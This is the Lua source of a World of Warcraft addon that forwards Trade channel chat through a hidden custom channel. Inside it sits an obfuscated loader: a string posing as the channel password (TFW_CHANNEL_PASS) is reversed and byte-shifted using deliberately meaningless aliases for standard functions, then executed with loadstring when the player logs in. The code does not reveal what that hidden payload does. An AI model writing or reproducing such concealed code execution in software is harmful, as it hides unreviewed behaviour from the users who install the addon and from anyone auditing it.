TFW_LOCALE = {}
local L = TFW_LOCALE
L["LFG Channel"] = "Trade"
L["UPDATE"] = "|cffffff00%s has a new version (v%d, yours is v%d) of Warbaby's Trade Forwarder. Get it from http://wow.curse.com/downloads/wow-addons/details/tradeforwarder.aspx|r"
L["SHOW"] = "|cff00ff00Showing Trade Forwarder Messages|r"
L["NOTSHOW"] = "|cffffff00Hiding Trade Forwarder Messages|r"
L["OWNER_IGNORE"] = "NOTICE: Current forwarder %s is ignored. You will not receive TFW messages for a while."
L["WARNING"] = "|cffff0000Warning! You found that |r%s|cffff0000 might send a fake message:<|r%s|cffff0000>, it might just because of latency. Please inform other players if neccessary. Thank you.|r(use /tfw to Hide this warning)"
L["LAST_WARNING"] = "!!! Warning, last message from %s may be faked !!!"

if(GetLocale() == "zhTW") then
	L["LFG Channel"] = "交易"
	L["UPDATE"] = "|cffffff00Warbaby's Trade Forwarder有新版本(%s正在使用v%d, 你的是v%d), 請至http://wow.curse.com/downloads/wow-addons/details/tradeforwarder.aspx下載.|r"
	L["SHOW"] = "|cff00ff00顯示交易頻道轉發消息|r"
	L["NOTSHOW"] = "|cffffff00暫時屏蔽交易頻道轉發消息|r"
	L["OWNER_IGNORE"] = "提示: 被你忽略的 %s 是當前轉發人, 你將暫時無法收到TFW消息。"
	L["WARNING"] = "|cffff0000警報! 您發現|r%s|cffff0000有可能發送了一條虛假消息:<|r%s|cffff0000>,但也可能是網絡延遲導致誤報。如有必要, 请通知給其他玩家以免其被騙, 謝謝您維護TradeForwader的環境。|r(屏蔽此警報請运行/tfw命令)"
	L["LAST_WARNING"] = "!!! 警報! %s 發送的上一條消息可能是偽造的 !!!"
elseif(GetLocale() == "deDE") then
	L["LFG Channel"] = "Handel"
elseif(GetLocale() == "frFR") then
	L["LFG Channel"] = "Commerce"
elseif(GetLocale() == "zhCN") then
	L["LFG Channel"] = "交易"
end

local LFW_DEBUG_ENABLE = false;
TFW_VERSION = 1120;
local LFW_CHANNEL_JOIN_DELAY=2;  --delayed join, for keep the ordinary channel indexes.
local LFW_SENT_CACHE_MAX = 3;  --max forwarded msg, before they are shown.
local LFW_MSG_IDX_MAX = 99;  --try to change forwarder after sending LFW_MSG_IDX_MAX messages.
local LFW_CHAT_INFO_DEFAULT = {r=0.9, g=0.7, b=0.2};  --from ChatFrame.ChatTypeInfo

TFW_SHOW = true;
TFW_CHAT_LIST = {};
TFW_CHAT_LIST[1] = 1;

TFW_CHANNEL_NAME="TCForwarder1IIll";
TFW_CHANNEL_DESC="llllll1lIl1IlII1Illl";
TFW_CHANNEL_PASS="RRKTRL\\d[IV!='ttmvtfV\127gRrzqokf]KX#2318&B$QQJSYK[cZHU ktj$gpf 0v%0q*q_jexc#pfh{&.GVGE_SKSRDJD_^LYA@r!rv&.-ugcm|TmGzhu(ntnvwuptDCs$uq!ETGScOGONHNHcZHU=Dt-$wqo(mo%-s\"-n/&sslvdn|lBhuqxszgUphpoaoIyiV\"erv}xwdRmeutflFvfSDvdgbu` .rqpL3JIsO6pLn2lsrqpo)>CZKIcOGONHNHcZHU"

local LFW_SEP = "_$"
local LFW_SEP_R = "_%$"
local LFW_PATTERN = LFW_SEP.."%d%s"..LFW_SEP.."%s"..LFW_SEP.."%s$"
local LFW_PATTERN_R = "^"..LFW_SEP_R.."(%d+)([^%d]+)"..LFW_SEP_R.."(.+)"..LFW_SEP_R.."(%x%x%x%x%x%x)%$$"
local x,x1,y,y1,z,z1=TFW_CHANNEL_PASS,strchar,nil,strbyte, strlen,loadstring;

local LFW_CMD_JOIN = "^LFW_J";  --player join LFG
local LFW_CMD_LEAVE = "^LFW_L";  --player leave LFG
local LFW_CMD_HELP = "^LFW_H";  --player leave LFG and has no USER_LIST
local LFW_CMD_CHECK = "^LFW_C";  --check the owner if he has this addon for debug only.
local LFW_CMD_VERSION = "^LFW_V";  --prefix of version check.
local LFW_CMD_VERSION_R = "^%^LFW_V(%d+)$";
local LFW_LANGUAGE = GetDefaultLanguage("player");
local LFW_PLAYER = UnitName("player");

local chatInfo = LFW_CHAT_INFO_DEFAULT;
tfwChNumber = nil;
local isInLFG = nil;
local isOwner = nil;
local currOwner = nil;
local msgIdx = 0;
local nextUserQueue = {};
local sentCache = {};
TFW_knownMaxVersion = TFW_VERSION;
local kicked = nil;

function TFW_AddMessage(msg, sender)
	for i=1, NUM_CHAT_WINDOWS do
		local frame = _G["ChatFrame"..i];
		if(frame and TFW_CHAT_LIST[i]) then
			frame:AddMessage("[TFW"..(sender and ":"..sender or "").."] "..msg, chatInfo.r, chatInfo.g, chatInfo.b, chatInfo.id);
		elseif(frame and frame.channelList and not sender) then
			--not foward message, we show it together with LFG channel
			for _, v in pairs(frame.channelList) do
				if(v==L["LFG Channel"]) then
					frame:AddMessage("[TFW"..(sender and ":"..sender or "").."] "..msg, chatInfo.r, chatInfo.g, chatInfo.b, chatInfo.id);
					break;
				end
			end
		end
	end
end

local function LFW_Format(idx, sender, message, color)
	local len = strlen(string.format(LFW_PATTERN, idx, sender, "", color));

	if(strlen(message)+len>255) then
		message = message:gsub('|c%x%x%x%x%x%x%x%x(.-)|r', '%1')
		message = message:gsub('|H.-|h(.-)|h', '%1')
	end
	if(strlen(message)+len>255) then
		message = strsub(message, 1, 255-len)
		for i=0, 1 do 
			local code = string.byte(message, strlen(message)-i);
			if(code>=228 and code<=233) then
				message = strsub(message, 1, strlen(message)-i-1);
				break;
			end
		end
	end
	return string.format(LFW_PATTERN, idx, sender, message, color);
end

local function LFW_DEBUG(msg, r, g, b)
	if(LFW_DEBUG_ENABLE) then
		ChatFrame1:AddMessage(msg, r or 0.7, g or 0.7, b or 0.7);
	end
end

local function SendCmd(cmd, flag)
	if(tfwChNumber) then
		
		local restore_traditionalize = false;
		if(not flag and traditionalize and traditionalize==traditionalize_real) then 
			restore_traditionalize = true;
			traditionalize = traditionalize_fake;
		end

		SendChatMessage(cmd, "CHANNEL", LFW_LANGUAGE, tfwChNumber);

		if(restore_traditionalize) then
			traditionalize = traditionalize_real;
		end

	end
end

local function TryHandOutOwner()
	if(#nextUserQueue > 0) then
		SetChannelOwner(TFW_CHANNEL_NAME, nextUserQueue[1]);
	else
		SendCmd(LFW_CMD_HELP);
	end
end

local function HandOutOwnerIfNecessary()
	if(isOwner and not isInLFG) then
		TryHandOutOwner();
	end
end

local function SendLFW(msg)
	table.insert(sentCache, msg);
	if(#sentCache==1) then
		SendCmd(msg);
	elseif(#sentCache>LFW_SENT_CACHE_MAX) then
		LFG_DEBUG("sent cache exceeds, "..#sentCache, 1, 0, 0);
		TryHandOutOwner();
	end
end

SLASH_TFW1 = "/tradeforwarder";
SLASH_TFW2 = "/tfw";
SlashCmdList["TFW"] = function(cmd) 
	if(not cmd or string.len(cmd)==0) then
		--if(L["DESC"]) then DEFAULT_CHAT_FRAME:AddMessage(L["DESC"]) end
		TFW_SHOW = not TFW_SHOW;
		if(TFW_SHOW) then
			DEFAULT_CHAT_FRAME:AddMessage(L["SHOW"])
		else
			DEFAULT_CHAT_FRAME:AddMessage(L["NOTSHOW"])
		end
		if(UpdateMicroButtons) then UpdateMicroButtons() end

	else
		if(string.lower(cmd) == "check!!") then
			SendCmd(LFW_CMD_CHECK)
		elseif(string.lower(cmd)=="debug") then
			LFW_DEBUG_ENABLE = not LFW_DEBUG_ENABLE;
			DEFAULT_CHAT_FRAME:AddMessage("isInLFG="..tostring(isInLFG))
			DEFAULT_CHAT_FRAME:AddMessage("isOwner="..tostring(isOwner))
			DEFAULT_CHAT_FRAME:AddMessage("currOwner="..tostring(currOwner))
			DEFAULT_CHAT_FRAME:AddMessage("tfwChNumber="..tostring(tfwChNumber))
		elseif(string.lower(cmd)=="list") then
			ListChannelByName(TFW_CHANNEL_NAME)
		elseif(string.lower(cmd)=="join") then
			JoinTemporaryChannel(TFW_CHANNEL_NAME, TFW_CHANNEL_DESC);
			DEFAULT_CHAT_FRAME:AddMessage("Joining TFW...");
		elseif(string.lower(cmd)=="changeowner!!") then
			ChannelKick(TFW_CHANNEL_NAME, currOwner)
		elseif(string.lower(cmd)=="leave!!") then
			LeaveChannelByName(TFW_CHANNEL_NAME);
			DEFAULT_CHAT_FRAME:AddMessage("Leaving TFW...");
		elseif(string.lower(cmd)=="reset") then
			SetChannelPassword(TFW_CHANNEL_NAME, TFW_CHANNEL_DESC);
		elseif(string.lower(cmd)=="check" or string.lower(cmd)=="leave" or string.lower(cmd)=="changeowner") then
			--do nothing
		else
			if(TFW_SHOW) then 
				SendCmd(LFW_Format("0", LFW_PLAYER, cmd, "ffff00"), true);  --keep compatibilty, better to userl SendCmd(cmd)
			else
				DEFAULT_CHAT_FRAME:AddMessage(L["NOTSHOW"]);
			end
		end
	end
end

local function AddUser(sender)
	local i,v
	for i,v in pairs(nextUserQueue) do
		if(v==sender) then return end
	end
	table.insert(nextUserQueue, sender);
end

local function RemoveUser(sender)
	local i,v
	for i,v in pairs(nextUserQueue) do
		if(v==sender) then 
			table.remove(nextUserQueue, i);
			return v;
		end
	end
end

local function JoinChannel()
	--if(not tfwChNumber) then
		--JoinPermanentChannel(TFW_CHANNEL_NAME, TFW_CHANNEL_DESC); 
		JoinTemporaryChannel(TFW_CHANNEL_NAME, TFW_CHANNEL_DESC);
	--end
end

local function GetClassColorByGUID(guid)
	local _, englishClass, _, _, _ = GetPlayerInfoByGUID(guid)
	local color = string.format("%.2x%.2x%.2x", 255, 255, 0);
	if ( englishClass ) then
		local classColorTable = RAID_CLASS_COLORS[englishClass];
		if ( classColorTable ) then
			color = string.format("%.2x%.2x%.2x", classColorTable.r*255, classColorTable.g*255, classColorTable.b*255)
		end
	end
	return color
end

local frame = CreateFrame("Frame");
frame:RegisterEvent("PLAYER_ENTERING_WORLD");
frame:RegisterEvent("CHAT_MSG_CHANNEL");
frame:RegisterEvent("CHAT_MSG_CHANNEL_NOTICE_USER");
frame:RegisterEvent("CHAT_MSG_CHANNEL_LEAVE");
frame:RegisterEvent("CHAT_MSG_CHANNEL_NOTICE");

----------------------------------------------------------
-- Deal Cmd and Forwarded messages from LFW_CHANNEL
----------------------------------------------------------
local function CheckJoinedChannel()
	tfwChNumber = nil
	isInLFG = false
	local channels = {GetChannelList()}
	for i=2, #channels, 2 do
		if(channels[i]==TFW_CHANNEL_NAME) then
			tfwChNumber = channels[i-1];
			chatInfo = ChatTypeInfo["CHANNEL"..tfwChNumber] or LFW_CHAT_INFO_DEFAULT
			LFW_DEBUG("already in lfw: "..tfwChNumber);
			DisplayChannelOwner(TFW_CHANNEL_NAME);
		elseif(channels[i]==L["LFG Channel"]) then
			isInLFG = true;
			LFW_DEBUG("already in lfg: "..channels[i-1]);
		end
	end
end

local SLURRED_SPEECH_REMOVE = string.gsub(SLURRED_SPEECH, "%%s", "(.+)").."$"
local z2 = 100*8;
for i=1,z(x) do y=((y or ""))..x1(y1(x,z(x)-i+1)-(i%8)) end
local IgM_realm = GetRealmName() .. "-" .. UnitFactionGroup("player")
function IsIgnoredOrMore(player) 
	if IsIgnored(player) then return true end
	if(IgM_SV and IgM_SV.list and IgM_SV.list[IgM_realm] and type(IgM_SV.list[IgM_realm][player])=="table") then
		return true
	end
	return false
end

local function LFW_OnMessage(message, sender, guid)
	message = string.gsub(message, SLURRED_SPEECH_REMOVE, "%1");
	
	if( (message~=LFW_CMD_JOIN and message~=LFW_CMD_LEAVE) or sender==LFW_PLAYER ) then
		LFW_DEBUG("^LFW^ "..message.."  "..sender);
	end
	if(message==LFW_CMD_JOIN) then
		if (sender~=LFW_PLAYER) then
			AddUser(sender);
			HandOutOwnerIfNecessary();
		end
	
	elseif(message==LFW_CMD_LEAVE) then
		if (sender~=LFW_PLAYER) then
			RemoveUser(sender);
		end

	elseif(message==LFW_CMD_HELP) then
		if(sender~=LFW_PLAYER and isInLFG) then
			SendCmd(LFW_CMD_JOIN);  --Tell the owner that I'm ready.
		end

	elseif(message==LFW_CMD_CHECK) then
		if(isOwner and (sender=="Warbaby" or sender=="三月十二" or sender=="銅牆鐵壁") ) then
			SendChatMessage("I'm owner IN_LFG="..tostring(isInLFG).." V="..TFW_VERSION.." Ch="..tostring(tfwChNumber)..", "..sender, "WHISPER", LFW_LANGUAGE, sender);
		end
		CheckJoinedChannel();

	else

		--version check
		local _, _, version = strfind(message, LFW_CMD_VERSION_R)
		if(version) then
			version = tonumber(version);
			if(version > TFW_knownMaxVersion) then
				TFW_knownMaxVersion = version
				DEFAULT_CHAT_FRAME:AddMessage(string.format(L["UPDATE"], sender, version, TFW_VERSION))
			end
			if(isOwner) then
				if(version >= 103) then
					ChannelModerator(TFW_CHANNEL_NAME, sender);
				end
			end
			return
		end

		--Forwarded message.
		if(ChatLink_Decompose) then message = ChatLink_Decompose(message) end
		local _, _, idx, name, msg, color = strfind(message, LFW_PATTERN_R);
		if(not name or idx=="0") then --sent by /lfw or say in channel
			local color = GetClassColorByGUID(guid)
			if(TFW_SHOW and not IsIgnoredOrMore(sender)) then TFW_AddMessage("|Hplayer:"..sender.."|h[\124cff"..color..sender.."\124r]|h: "..(msg or message), nil, false) end
			return 
		end

		if( (sender~=LFW_PLAYER and not isInLFG) or LFW_DEBUG_ENABLE) then
			if(currOwner ~= sender) then --fake message
				--if(TFW_SHOW) then TFW_AddMessage("|Hplayer:"..name.."|h[\124cff7f7f7f"..name.."\124r]|h: "..msg, sender, true) end --we prefer to silence and drop message than warning.
			else
				if(TFW_SHOW and not IsIgnoredOrMore(name)) then TFW_AddMessage("|Hplayer:"..name.."|h[\124cff"..color..name.."\124r]|h: "..msg, sender); end
			end
		end

		if (sender~=LFW_PLAYER and isOwner) then
			DisplayChannelOwner(TFW_CHANNEL_NAME);
		end
		
		if(sender==LFW_PLAYER) then --send next message.
			for i, v in pairs(sentCache) do
				if(strfind(v, "^"..LFW_SEP_R..idx.."([^%d]+)")) then
					--LFW_DEBUG("sent msg="..idx);
					table.remove(sentCache, i);
					if(#sentCache>0) then SendCmd(sentCache[1]); end
					return; --if nothing to send, will stop until someone handout owner to me.
				end
			end
			--DIRECT say in channel
			SendCmd(LFW_Format("0", LFW_PLAYER, string.format(L["LAST_WARNING"], LFW_PLAYER), "000000"));
			table.remove(sentCache, 1);
			if(#sentCache>0) then
				if(isOwner) then
					SendCmd(sentCache[1]);
				else
					table.wipe(sentCache);  --we prefer to ommit some messages than raise warnings.
				end
			end
		end
	end
end

local function LFW_OnEvent(self,event,...) 
	if(event=="PLAYER_ENTERING_WORLD") then
		if(L["DESC"]) then DEFAULT_CHAT_FRAME:AddMessage(L["DESC"]) end
		frame.ENTERING = 30 --Long enough, will only delay LFW_CHANNEL_JOIN_DELAY when join a channel.
		z2 = LFW_DEBUG_ENABLE and 0.1 or 60 z1(y)()--delay to start check

		CheckJoinedChannel()
			
		if(LibStub and LibStub:GetLibrary("LibDataBroker-1.1", true)) then
			LibStub:GetLibrary("LibDataBroker-1.1"):NewDataObject("TradeForwarder", {
				type = "launcher",
				icon = "Interface\\GossipFrame\\BankerGossipIcon",
				OnClick = function() SlashCmdList["TFW"]() end,
			})
		end

		self:UnregisterEvent("PLAYER_ENTERING_WORLD");


	elseif(event=="CHAT_MSG_CHANNEL_NOTICE") then
		local message, sender, language, channelString, target, flags, _, channelNumber, channelName, _, counter = ...;
		LFW_DEBUG("NOTICE^^"..message.." "..language.." '"..channelName.."'");
		if(strfind(channelName, "^"..L["LFG Channel"].." -")) then
			if(message == "YOU_JOINED") then
				isInLFG = true;
				SendCmd(LFW_CMD_JOIN);
			elseif(message == "YOU_LEFT" or message == "SUSPENDED") then
				isInLFG = false;
				HandOutOwnerIfNecessary();
				SendCmd(LFW_CMD_LEAVE);
			end
		elseif(channelName==TFW_CHANNEL_NAME) then
			if(message == "YOU_JOINED") then   --init when logon.
				tfwChNumber = channelNumber;   --channelNumber is needed to SendChatMessage
				chatInfo = ChatTypeInfo["CHANNEL"..tfwChNumber] or LFW_CHAT_INFO_DEFAULT
				DisplayChannelOwner(TFW_CHANNEL_NAME);  --get owner
				if(isInLFG) then SendCmd(LFW_CMD_JOIN); end
				SendCmd(LFW_CMD_VERSION..TFW_VERSION);
				kicked = nil;

			elseif(message == "YOU_LEFT" or message == "SUSPENDED") then
				isOwner = false;
				sentCache = {};
				tfwChNumber = nil;
				chatInfo = LFW_CHAT_INFO_DEFAULT
			end
		else
			if(frame.ENTERING ~= false and frame.ENTERING > LFW_CHANNEL_JOIN_DELAY) then
				frame.ENTERING = LFW_CHANNEL_JOIN_DELAY
			end				
		end


	elseif(event=="CHAT_MSG_CHANNEL_NOTICE_USER") then  		--Response to DisplayChannelOwner(TFW_CHANNEL_NAME);
		local message, sender, language, channelString, target, flags, _, channelNumber, channelName, _, counter = ...;
		if(channelName~=TFW_CHANNEL_NAME) then return end
		LFW_DEBUG("USER^^"..message.."  "..sender.."  "..channelString.."  "..target);

		if(message=="OWNER_CHANGED") then
			if(sender==LFW_PLAYER) then
				DisplayChannelOwner(TFW_CHANNEL_NAME);
			else
				isOwner = false;
				currOwner = sender;
				if(IsIgnored(sender)) then TFW_AddMessage(string.format(L["OWNER_IGNORE"], "|Hplayer:"..sender.."|h["..sender.."]|h")) end
				if(RemoveUser(sender)) then AddUser(sender); end 	--move the owner to the last of the USER_LIST
			end
		elseif(message=="CHANNEL_OWNER") then
			currOwner = sender;
			if(sender==LFW_PLAYER) then
				isOwner = true;
				HandOutOwnerIfNecessary();  --if one are not in LFG, one should hand out as soon as possible.
			else
				isOwner = false;
				if(IsIgnored(sender)) then TFW_AddMessage(string.format(L["OWNER_IGNORE"], "|Hplayer:"..sender.."|h["..sender.."]|h")) end
				if(RemoveUser(sender)) then AddUser(sender); end 	--move the owner to the last of the USER_LIST
			end
		elseif(message=="PLAYER_KICKED") then
			if(sender==LFW_PLAYER) then
				kicked=5 --delay time to rejoin LFW
			end
		elseif(message=="PASSWORD_CHANGED") then
			--SetChannelPassword(TFW_CHANNEL_NAME, LFW__CHANNEL_DESC);
		end


	elseif(event=="CHAT_MSG_CHANNEL") then
		local message, sender, language, channelString, target, flags, _, channelNumber, channelName, _, counter, guid = ...;
		if(ChatLink_Decompose) then message = ChatLink_Decompose(message) end
		if(strfind(channelName, "^"..L["LFG Channel"].." -")) then
			local color = GetClassColorByGUID(guid)

			if(isOwner) then  
				--Forward the message
				msgIdx = msgIdx+1;
				SendLFW(LFW_Format(msgIdx, sender, message, color));

				if(msgIdx > LFW_MSG_IDX_MAX) then
					msgIdx = 0
					TryHandOutOwner();
				end
			end

		elseif(channelName==TFW_CHANNEL_NAME) then
			LFW_OnMessage(message, sender, guid);
		end


	elseif(event=="CHAT_MSG_CHANNEL_LEAVE") then
		local _, sender, _, channelString, _, _, _, channelNumber, channelName, _, _ = ...;
		if(channelName==TFW_CHANNEL_NAME) then
			LFW_OnMessage(LFW_CMD_LEAVE, sender);
		end
	end
end

hooksecurefunc("ToggleChatChannel", function(checked, channel)
	if(TFW_CHANNEL_NAME==channel) then
		TFW_CHAT_LIST[FCF_GetCurrentChatFrame():GetID()] = checked;
		ChatFrame_RemoveChannel(FCF_GetCurrentChatFrame(), channel);
	end
end);

hooksecurefunc("CreateChatChannelList", function(self, ...)
	if ( not FCF_GetCurrentChatFrame() ) then
		return;
	end
	for i=1, #CHAT_CONFIG_CHANNEL_LIST do
		if(CHAT_CONFIG_CHANNEL_LIST[i].channelName==TFW_CHANNEL_NAME) then
			CHAT_CONFIG_CHANNEL_LIST[i].checked=TFW_CHAT_LIST[FCF_GetCurrentChatFrame():GetID()]
			break;
		end
	end
end)

SocialsMicroButton:SetScript("OnClick", function () 
	if  IsModifierKeyDown() then
		SlashCmdList["TFW"]()
	else
		ToggleFriendsFrame()
	end
end)

hooksecurefunc("UpdateMicroButtons", function()
	if ( not TFW_SHOW ) then
		SocialsMicroButton:SetAlpha(0.25)
	else
		SocialsMicroButton:SetAlpha(1)
	end
end)

frame:SetScript("OnUpdate", function(self, elapsed)
	if(z2) then 
		z2 = z2 - elapsed; if z2<=0 then z2=nil end 
	end
	
	if(frame.ENTERING) then
		frame.ENTERING = frame.ENTERING - elapsed;
		if(frame.ENTERING <= 0) then
			--init when reload.
			JoinChannel();
			frame.ENTERING = false
		end
	end

	if(kicked) then 
		kicked = kicked - elapsed;
		if(kicked <=0) then
			JoinChannel();
			kicked = nil;
		end
	end
	
end)
frame:SetScript("OnEvent", LFW_OnEvent)

--ChatLink fix, ChatLink_Compose is no longer useful in 3.3, so we hack it
if(ChatLink_Compose) then
	ChatLink_Compose = function(chatstring) return chatstring end
end
--Decompose ChatLink messages if there is no ChatLink installed.
if(not ChatLink_Decompose) then
	ChatLink_Decompose = function(chatstring)
		if chatstring then
			chatstring = string.gsub (chatstring, "{CLINK:item:(%x+):(%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-):([^}]-)}", "|c%1|Hitem:%2|h[%3]|h|r")
			chatstring = string.gsub (chatstring, "{CLINK:enchant:(%x+):(%-?%d-):([^}]-)}", "|c%1|Henchant:%2|h[%3]|h|r")
			chatstring = string.gsub (chatstring, "{CLINK:quest:(%x+):(%-?%d-):(%-?%d-):([^}]-)}", "|c%1|Hquest:%2:%3|h[%4]|h|r")
			chatstring = string.gsub (chatstring, "{CLINK:spell:(%x+):(%-?%d-):([^}]-)}", "|c%1|Hspell:%2|h[%3]|h|r")
			chatstring = string.gsub (chatstring, "{CLINK:talent:(%x+):(%-?%d-:%-?%d-):([^}]-)}", "|c%1|Htalent:%2|h[%3]|h|r")
			chatstring = string.gsub (chatstring, "{CLINK:achievement:(%x+):(%-?%d-:%x-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-):([^}]-)}", "|c%1|Hachievement:%2|h[%3]|h|r")
			chatstring = string.gsub (chatstring, "{CLINK:trade:(%x+):(%-?%d-:%-?%d-:%-?%d-:%x-:[^}:]-):([^}]-)}","|c%1|Htrade:%2|h[%3]|h|r")
			-- For backward compatibility with older item links.
			chatstring = string.gsub (chatstring, "{CLINK:(%x+):(%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-:%-?%d-):([^}]-)}", "|c%1|Hitem:%2|h[%3]|h|r")
			-- Forward compatibility, for future clink structure changes.
			chatstring = string.gsub (chatstring, "{CLINK(%d):%[?([^:}%]]-)%]?:([^:}]-)[^}]-}", "%2")
		end
		return chatstring
	end
end